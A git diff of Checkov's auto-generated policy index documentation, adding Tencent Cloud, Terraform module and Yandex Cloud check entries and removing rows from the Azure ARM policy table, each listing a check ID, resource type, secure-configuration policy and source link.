+| 3907 | CKV_TC_9                 | resource                         | tencentcloud_mysql_instance                                                                      | Ensure Tencent Cloud mysql instances do not enable access from public networks                                                                                                                           | Terraform               | [CDBInternetService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CDBInternetService.py)                                                                                  |
+| 3908 | CKV_TC_10                | resource                         | tencentcloud_mysql_instance                                                                      | Ensure Tencent Cloud MySQL instances intranet ports are not set to the default 3306                                                                                                                      | Terraform               | [CDBIntranetPort.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CDBIntranetPort.py)                                                                                        |
+| 3909 | CKV_TC_11                | resource                         | tencentcloud_clb_instance                                                                        | Ensure Tencent Cloud CLB has a logging ID and topic                                                                                                                                                      | Terraform               | [CLBInstanceLog.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CLBInstanceLog.py)                                                                                          |
+| 3910 | CKV_TC_12                | resource                         | tencentcloud_clb_listener                                                                        | Ensure Tencent Cloud CLBs use modern, encrypted protocols                                                                                                                                                | Terraform               | [CLBListenerProtocol.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CLBListenerProtocol.py)                                                                                |
+| 3911 | CKV_TC_13                | resource                         | tencentcloud_instance                                                                            | Ensure Tencent Cloud CVM user data does not contain sensitive information                                                                                                                                | Terraform               | [CVMUserData.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/CVMUserData.py)                                                                                                |
+| 3912 | CKV_TC_14                | resource                         | tencentcloud_vpc_flow_log_config                                                                 | Ensure Tencent Cloud VPC flow logs are enabled                                                                                                                                                           | Terraform               | [VPCFlowLogConfigEnable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/tencentcloud/VPCFlowLogConfigEnable.py)                                                                          |
+| 3913 | CKV_TF_1                 | module                           | module                                                                                           | Ensure Terraform module sources use a commit hash                                                                                                                                                        | Terraform               | [RevisionHash.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionHash.py)                                                                                                     |
+| 3914 | CKV_TF_2                 | module                           | module                                                                                           | Ensure Terraform module sources use a tag with a version number                                                                                                                                          | Terraform               | [RevisionVersionTag.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/module/generic/RevisionVersionTag.py)                                                                                         |
+| 3915 | CKV_YC_1                 | resource                         | yandex_mdb_clickhouse_cluster                                                                    | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform               | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                                       |
+| 3916 | CKV_YC_1                 | resource                         | yandex_mdb_elasticsearch_cluster                                                                 | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform               | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                                       |
+| 3917 | CKV_YC_1                 | resource                         | yandex_mdb_greenplum_cluster                                                                     | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform               | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                                       |
+| 3918 | CKV_YC_1                 | resource                         | yandex_mdb_kafka_cluster                                                                         | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform               | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                                       |
+| 3919 | CKV_YC_1                 | resource                         | yandex_mdb_mongodb_cluster                                                                       | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform               | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                                       |
+| 3920 | CKV_YC_1                 | resource                         | yandex_mdb_mysql_cluster                                                                         | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform               | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                                       |
+| 3921 | CKV_YC_1                 | resource                         | yandex_mdb_postgresql_cluster                                                                    | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform               | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                                       |
+| 3922 | CKV_YC_1                 | resource                         | yandex_mdb_redis_cluster                                                                         | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform               | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                                       |
+| 3923 | CKV_YC_1                 | resource                         | yandex_mdb_sqlserver_cluster                                                                     | Ensure security group is assigned to database cluster.                                                                                                                                                   | Terraform               | [MDBSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBSecurityGroup.py)                                                                                       |
+| 3924 | CKV_YC_2                 | resource                         | yandex_compute_instance                                                                          | Ensure compute instance does not have public IP.                                                                                                                                                         | Terraform               | [ComputeVMPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMPublicIP.py)                                                                                     |
+| 3925 | CKV_YC_3                 | resource                         | yandex_storage_bucket                                                                            | Ensure storage bucket is encrypted.                                                                                                                                                                      | Terraform               | [ObjectStorageBucketEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketEncryption.py)                                                             |
+| 3926 | CKV_YC_4                 | resource                         | yandex_compute_instance                                                                          | Ensure compute instance does not have serial console enabled.                                                                                                                                            | Terraform               | [ComputeVMSerialConsole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSerialConsole.py)                                                                           |
+| 3927 | CKV_YC_5                 | resource                         | yandex_kubernetes_cluster                                                                        | Ensure Kubernetes cluster does not have public IP address.                                                                                                                                               | Terraform               | [K8SPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SPublicIP.py)                                                                                                 |
+| 3928 | CKV_YC_6                 | resource                         | yandex_kubernetes_node_group                                                                     | Ensure Kubernetes cluster node group does not have public IP addresses.                                                                                                                                  | Terraform               | [K8SNodeGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupPublicIP.py)                                                                               |
+| 3929 | CKV_YC_7                 | resource                         | yandex_kubernetes_cluster                                                                        | Ensure Kubernetes cluster auto-upgrade is enabled.                                                                                                                                                       | Terraform               | [K8SAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SAutoUpgrade.py)                                                                                           |
+| 3930 | CKV_YC_8                 | resource                         | yandex_kubernetes_node_group                                                                     | Ensure Kubernetes node group auto-upgrade is enabled.                                                                                                                                                    | Terraform               | [K8SNodeGroupAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupAutoUpgrade.py)                                                                         |
+| 3931 | CKV_YC_9                 | resource                         | yandex_kms_symmetric_key                                                                         | Ensure KMS symmetric key is rotated.                                                                                                                                                                     | Terraform               | [KMSSymmetricKeyRotation.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/KMSSymmetricKeyRotation.py)                                                                         |
+| 3932 | CKV_YC_10                | resource                         | yandex_kubernetes_cluster                                                                        | Ensure etcd database is encrypted with KMS key.                                                                                                                                                          | Terraform               | [K8SEtcdKMSEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SEtcdKMSEncryption.py)                                                                               |
+| 3933 | CKV_YC_11                | resource                         | yandex_compute_instance                                                                          | Ensure security group is assigned to network interface.                                                                                                                                                  | Terraform               | [ComputeVMSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeVMSecurityGroup.py)                                                                           |
+| 3934 | CKV_YC_12                | resource                         | yandex_mdb_clickhouse_cluster                                                                    | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform               | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                                 |
+| 3935 | CKV_YC_12                | resource                         | yandex_mdb_elasticsearch_cluster                                                                 | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform               | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                                 |
+| 3936 | CKV_YC_12                | resource                         | yandex_mdb_greenplum_cluster                                                                     | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform               | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                                 |
+| 3937 | CKV_YC_12                | resource                         | yandex_mdb_kafka_cluster                                                                         | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform               | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                                 |
+| 3938 | CKV_YC_12                | resource                         | yandex_mdb_mongodb_cluster                                                                       | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform               | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                                 |
+| 3939 | CKV_YC_12                | resource                         | yandex_mdb_mysql_cluster                                                                         | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform               | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                                 |
+| 3940 | CKV_YC_12                | resource                         | yandex_mdb_postgresql_cluster                                                                    | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform               | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                                 |
+| 3941 | CKV_YC_12                | resource                         | yandex_mdb_sqlserver_cluster                                                                     | Ensure public IP is not assigned to database cluster.                                                                                                                                                    | Terraform               | [MDBPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/MDBPublicIP.py)                                                                                                 |
+| 3942 | CKV_YC_13                | resource                         | yandex_resourcemanager_cloud_iam_binding                                                         | Ensure cloud member does not have elevated access.                                                                                                                                                       | Terraform               | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py)                                                                         |
+| 3943 | CKV_YC_13                | resource                         | yandex_resourcemanager_cloud_iam_member                                                          | Ensure cloud member does not have elevated access.                                                                                                                                                       | Terraform               | [IAMCloudElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMCloudElevatedMembers.py)                                                                         |
+| 3944 | CKV_YC_14                | resource                         | yandex_kubernetes_cluster                                                                        | Ensure security group is assigned to Kubernetes cluster.                                                                                                                                                 | Terraform               | [K8SSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SSecurityGroup.py)                                                                                       |
+| 3945 | CKV_YC_15                | resource                         | yandex_kubernetes_node_group                                                                     | Ensure security group is assigned to Kubernetes node group.                                                                                                                                              | Terraform               | [K8SNodeGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNodeGroupSecurityGroup.py)                                                                     |
+| 3946 | CKV_YC_16                | resource                         | yandex_kubernetes_cluster                                                                        | Ensure network policy is assigned to Kubernetes cluster.                                                                                                                                                 | Terraform               | [K8SNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/K8SNetworkPolicy.py)                                                                                       |
+| 3947 | CKV_YC_17                | resource                         | yandex_storage_bucket                                                                            | Ensure storage bucket does not have public access permissions.                                                                                                                                           | Terraform               | [ObjectStorageBucketPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ObjectStorageBucketPublicAccess.py)                                                         |
+| 3948 | CKV_YC_18                | resource                         | yandex_compute_instance_group                                                                    | Ensure compute instance group does not have public IP.                                                                                                                                                   | Terraform               | [ComputeInstanceGroupPublicIP.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupPublicIP.py)                                                               |
+| 3949 | CKV_YC_19                | resource                         | yandex_vpc_security_group                                                                        | Ensure security group does not contain allow-all rules.                                                                                                                                                  | Terraform               | [VPCSecurityGroupAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupAllowAll.py)                                                                       |
+| 3950 | CKV_YC_20                | resource                         | yandex_vpc_security_group_rule                                                                   | Ensure security group rule is not allow-all.                                                                                                                                                             | Terraform               | [VPCSecurityGroupRuleAllowAll.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/VPCSecurityGroupRuleAllowAll.py)                                                               |
+| 3951 | CKV_YC_21                | resource                         | yandex_organizationmanager_organization_iam_binding                                              | Ensure organization member does not have elevated access.                                                                                                                                                | Terraform               | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py)                                                           |
+| 3952 | CKV_YC_21                | resource                         | yandex_organizationmanager_organization_iam_member                                               | Ensure organization member does not have elevated access.                                                                                                                                                | Terraform               | [IAMOrganizationElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMOrganizationElevatedMembers.py)                                                           |
+| 3953 | CKV_YC_22                | resource                         | yandex_compute_instance_group                                                                    | Ensure compute instance group has security group assigned.                                                                                                                                               | Terraform               | [ComputeInstanceGroupSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/ComputeInstanceGroupSecurityGroup.py)                                                     |
+| 3954 | CKV_YC_23                | resource                         | yandex_resourcemanager_folder_iam_binding                                                        | Ensure folder member does not have elevated access.                                                                                                                                                      | Terraform               | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py)                                                                       |
+| 3955 | CKV_YC_23                | resource                         | yandex_resourcemanager_folder_iam_member                                                         | Ensure folder member does not have elevated access.                                                                                                                                                      | Terraform               | [IAMFolderElevatedMembers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMFolderElevatedMembers.py)                                                                       |
+| 3956 | CKV_YC_24                | resource                         | yandex_organizationmanager_organization_iam_binding                                              | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform               | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                         |
+| 3957 | CKV_YC_24                | resource                         | yandex_organizationmanager_organization_iam_member                                               | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform               | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                         |
+| 3958 | CKV_YC_24                | resource                         | yandex_resourcemanager_cloud_iam_binding                                                         | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform               | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                         |
+| 3959 | CKV_YC_24                | resource                         | yandex_resourcemanager_cloud_iam_member                                                          | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform               | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                         |
+| 3960 | CKV_YC_24                | resource                         | yandex_resourcemanager_folder_iam_binding                                                        | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform               | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                         |
+| 3961 | CKV_YC_24                | resource                         | yandex_resourcemanager_folder_iam_member                                                         | Ensure passport account is not used for assignment. Use service accounts and federated accounts where possible.                                                                                          | Terraform               | [IAMPassportAccountUsage.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/yandexcloud/IAMPassportAccountUsage.py)                                                                         |
 
 
 ---
diff --git a/docs/5.Policy Index/arm.md b/docs/5.Policy Index/arm.md
index bb7a2dc32ba..a1a70205208 100644
--- a/docs/5.Policy Index/arm.md	
+++ b/docs/5.Policy Index/arm.md	
@@ -6,103 +6,207 @@ nav_order: 1
 
 # arm resource scans (auto generated)
 
-|    | Id            | Type      | Entity                                                                       | Policy                                                                                                       | IaC   | Resource Link                                                                                                                                                                      |
-|----|---------------|-----------|------------------------------------------------------------------------------|--------------------------------------------------------------------------------------------------------------|-------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|
-|  0 | CKV_AZURE_1   | resource  | Microsoft.Compute/virtualMachines                                            | Ensure Azure Instance does not use basic authentication(Use SSH Key Instead)                                 | arm   | [AzureInstancePassword.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureInstancePassword.py)                                                 |
-|  1 | CKV_AZURE_2   | resource  | Microsoft.Compute/disks                                                      | Ensure Azure managed disk have encryption enabled                                                            | arm   | [AzureManagedDiscEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AzureManagedDiscEncryption.py)                                       |
-|  2 | CKV_AZURE_3   | resource  | Microsoft.Storage/storageAccounts                                            | Ensure that 'supportsHttpsTrafficOnly' is set to 'true'                                                      | arm   | [StorageAccountsTransportEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/StorageAccountsTransportEncryption.py)                       |
-|  3 | CKV_AZURE_4   | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure AKS logging to Azure Monitoring is Configured                                                         | arm   | [AKSLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSLoggingEnabled.py)                                                         |
-|  4 | CKV_AZURE_5   | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure RBAC is enabled on AKS clusters                                                                       | arm   | [AKSRbacEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSRbacEnabled.py)                                                               |
-|  5 | CKV_AZURE_6   | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure AKS has an API Server Authorized IP Ranges enabled                                                    | arm   | [AKSApiServerAuthorizedIpRanges.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSApiServerAuthorizedIpRanges.py)                               |
-|  6 | CKV_AZURE_7   | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure AKS cluster has Network Policy configured                                                             | arm   | [AKSNetworkPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSNetworkPolicy.py)                                                           |
-|  7 | CKV_AZURE_8   | resource  | Microsoft.ContainerService/managedClusters                                   | Ensure Kubernetes Dashboard is disabled                                                                      | arm   | [AKSDashboardDisabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AKSDashboardDisabled.py)                                                   |
-|  8 | CKV_AZURE_9   | resource  | Microsoft.Network/networkSecurityGroups                                      | Ensure that RDP access is restricted from the internet                                                       | arm   | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py)                                       |
-|  9 | CKV_AZURE_9   | resource  | Microsoft.Network/networkSecurityGroups/securityRules                        | Ensure that RDP access is restricted from the internet                                                       | arm   | [NSGRuleRDPAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleRDPAccessRestricted.py)                                       |
-| 10 | CKV_AZURE_10  | resource  | Microsoft.Network/networkSecurityGroups                                      | Ensure that SSH access is restricted from the internet                                                       | arm   | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py)                                       |
-| 11 | CKV_AZURE_10  | resource  | Microsoft.Network/networkSecurityGroups/securityRules                        | Ensure that SSH access is restricted from the internet                                                       | arm   | [NSGRuleSSHAccessRestricted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NSGRuleSSHAccessRestricted.py)                                       |
-| 12 | CKV_AZURE_11  | resource  | Microsoft.Sql/servers                                                        | Ensure no SQL Databases allow ingress from 0.0.0.0/0 (ANY IP)                                                | arm   | [SQLServerNoPublicAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerNoPublicAccess.py)                                             |
-| 13 | CKV_AZURE_12  | resource  | Microsoft.Network/networkWatchers/FlowLogs                                   | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                       | arm   | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                     |
-| 14 | CKV_AZURE_12  | resource  | Microsoft.Network/networkWatchers/FlowLogs/                                  | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                       | arm   | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                     |
-| 15 | CKV_AZURE_12  | resource  | Microsoft.Network/networkWatchers/flowLogs                                   | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                       | arm   | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                     |
-| 16 | CKV_AZURE_12  | resource  | Microsoft.Network/networkWatchers/flowLogs/                                  | Ensure that Network Security Group Flow Log retention period is 'greater than 90 days'                       | arm   | [NetworkWatcherFlowLogPeriod.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/NetworkWatcherFlowLogPeriod.py)                                     |
-| 17 | CKV_AZURE_13  | resource  | Microsoft.Web/sites/config                                                   | Ensure App Service Authentication is set on Azure App Service                                                | arm   | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py)                                           |
-| 18 | CKV_AZURE_13  | resource  | config                                                                       | Ensure App Service Authentication is set on Azure App Service                                                | arm   | [AppServiceAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceAuthentication.py)                                           |
-| 19 | CKV_AZURE_14  | resource  | Microsoft.Web/sites                                                          | Ensure web app redirects all HTTP traffic to HTTPS in Azure App Service                                      | arm   | [AppServiceHTTPSOnly.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHTTPSOnly.py)                                                     |
-| 20 | CKV_AZURE_15  | resource  | Microsoft.Web/sites                                                          | Ensure web app is using the latest version of TLS encryption                                                 | arm   | [AppServiceMinTLSVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceMinTLSVersion.py)                                             |
-| 21 | CKV_AZURE_16  | resource  | Microsoft.Web/sites                                                          | Ensure that Register with Azure Active Directory is enabled on App Service                                   | arm   | [AppServiceIdentity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceIdentity.py)                                                       |
-| 22 | CKV_AZURE_17  | resource  | Microsoft.Web/sites                                                          | Ensure the web app has 'Client Certificates (Incoming client certificates)' set                              | arm   | [AppServiceClientCertificate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceClientCertificate.py)                                     |
-| 23 | CKV_AZURE_18  | resource  | Microsoft.Web/sites                                                          | Ensure that 'HTTP Version' is the latest if used to run the web app                                          | arm   | [AppServiceHttps20Enabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/AppServiceHttps20Enabled.py)                                           |
-| 24 | CKV_AZURE_19  | resource  | Microsoft.Security/pricings                                                  | Ensure that standard pricing tier is selected                                                                | arm   | [SecurityCenterStandardPricing.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterStandardPricing.py)                                 |
-| 25 | CKV_AZURE_20  | resource  | Microsoft.Security/securityContacts                                          | Ensure that security contact 'Phone number' is set                                                           | arm   | [SecurityCenterContactPhone.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactPhone.py)                                       |
-| 26 | CKV_AZURE_21  | resource  | Microsoft.Security/securityContacts                                          | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                | arm   | [SecurityCenterContactEmailAlert.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlert.py)                             |
-| 27 | CKV_AZURE_22  | resource  | Microsoft.Security/securityContacts                                          | Ensure that 'Send email notification for high severity alerts' is set to 'On'                                | arm   | [SecurityCenterContactEmailAlertAdmins.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SecurityCenterContactEmailAlertAdmins.py)                 |
-| 28 | CKV_AZURE_23  | resource  | Microsoft.Sql/servers                                                        | Ensure that 'Auditing' is set to 'Enabled' for SQL servers                                                   | arm   | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py)                                           |
-| 29 | CKV_AZURE_23  | resource  | Microsoft.Sql/servers/databases                                              | Ensure that 'Auditing' is set to 'Enabled' for SQL servers                                                   | arm   | [SQLServerAuditingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingEnabled.py)                                           |
-| 30 | CKV_AZURE_24  | resource  | Microsoft.Sql/servers                                                        | Ensure that 'Auditing' Retention is 'greater than 90 days' for SQL servers                                   | arm   | [SQLServerAuditingRetention90Days.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerAuditingRetention90Days.py)                           |
-| 31 | CKV_AZURE_25  | resource  | Microsoft.Sql/servers/databases                                              | Ensure that 'Threat Detection types' is set to 'All'                                                         | arm   | [SQLServerThreatDetectionTypes.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerThreatDetectionTypes.py)                                 |
-| 32 | CKV_AZURE_26  | resource  | Microsoft.Sql/servers/databases                                              | Ensure that 'Send Alerts To' is enabled for MSSQL servers                                                    | arm   | [SQLServerEmailAlertsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsEnabled.py)                                     |
-| 33 | CKV_AZURE_27  | resource  | Microsoft.Sql/servers/databases                                              | Ensure that 'Email service and co-administrators' is 'Enabled' for MSSQL servers                             | arm   | [SQLServerEmailAlertsToAdminsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/SQLServerEmailAlertsToAdminsEnabled.py)                     |
-| 34 | CKV_AZURE_28  | resource  | Microsoft.DBforMySQL/servers                                                 | Ensure 'Enforce SSL connection' is set to 'ENABLED' for MySQL Database Server                                | arm   | [MySQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/MySQLServerSSLEnforcementEnabled.py)                           |
-| 35 | CKV_AZURE_29  | resource  | Microsoft.DBforPostgreSQL/servers                                            | Ensure 'Enforce SSL connection' is set to 'ENABLED' for PostgreSQL Database Server                           | arm   | [PostgreSQLServerSSLEnforcementEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerSSLEnforcementEnabled.py)                 |
-| 36 | CKV_AZURE_30  | resource  | Microsoft.DBforPostgreSQL/servers/configurations                             | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server                      | arm   | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py)                 |
-| 37 | CKV_AZURE_30  | resource  | configurations                                                               | Ensure server parameter 'log_checkpoints' is set to 'ON' for PostgreSQL Database Server                      | arm   | [PostgreSQLServerLogCheckpointsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/arm/checks/resource/PostgreSQLServerLogCheckpointsEnabled.py)                 |
